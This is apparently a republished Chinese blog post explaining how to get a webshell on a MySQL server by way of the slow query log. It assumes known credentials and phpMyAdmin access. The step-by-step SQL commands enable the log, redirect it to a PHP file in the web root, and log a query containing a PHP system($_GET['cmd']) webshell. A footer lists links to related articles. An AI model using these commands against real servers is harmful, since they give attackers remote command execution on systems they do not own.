mysql慢查询日志getshell
2020-03-31 18:45
4792 查看
0x00 前言
1.实战场景
- 目标站点存在phpMyAdmin和l.php探针
- 知道mysql登录密码
- secure_file_priv未开启
0x01 正文
如果登录了phpMyadmin没有办法直接写入文件,可以使用慢查询日志来进行文件写入。
关于慢查询日志相关知识点可以参考 https://www.geek-share.com/detail/2702031320.html
简单的说就是在mysql中,查询超过10秒的语句会被写到慢查询日志文件中去,一般默认是不开启的。利用这个特性就可以进行文件写入。
1.利用过程
首先查询slow的配置。
show variables like '%slow_query_log%';
首先是开启日志
set global slow_query_log=1;
然后设置log日志的位置,设置为web目录下
set global slow_query_log_file='C:\\phpStudy\\WWW\\cs.php';
查看下是否修改成功
show variables like '%slow_query_log%';
触发慢查询日志
select '<?php echo system($_GET["cmd"]);?>' or sleep(11);
访问设置好的目录,可以看到已经成功了,getshell同理。
- 点赞
- 收藏
- 分享
- 文章举报
相关文章推荐
- shell脚本分析mysql慢查询日志(slow log)
- shell脚本分析mysql慢查询日志(slow log)
- mysql下的慢查询堵塞处理shell脚本
- MySQL慢查询日志
- mysql 慢查询日志设置
- MySQL技术之旅-慢查询日志可视化平台的使用(Anemometer)
- mysql慢查询日志
- MySQL查询日志总结
- MySQL慢查询和慢查询日志分析
- MySQL优化 - 开启MySQL慢查询日志及分析工具mysqldumpslow
- mysql慢查询日志开启
- mysql中general_log(查询日志)关闭
- MySQL 5.1.6以上版本动态开启慢查询日志 推荐
- <Power Shell>07查询AD角色拥有者和备份企业SQL数据库和日志
- mysql5.6开启全查询日志时注意事项
- MySQL 慢查询日志
- mysql慢查询日志使用总结
- mysql 慢查询日志
- mysql开启慢查询日志及查询--windows
- MySQL 5.0+ 记录所有查询日志(log)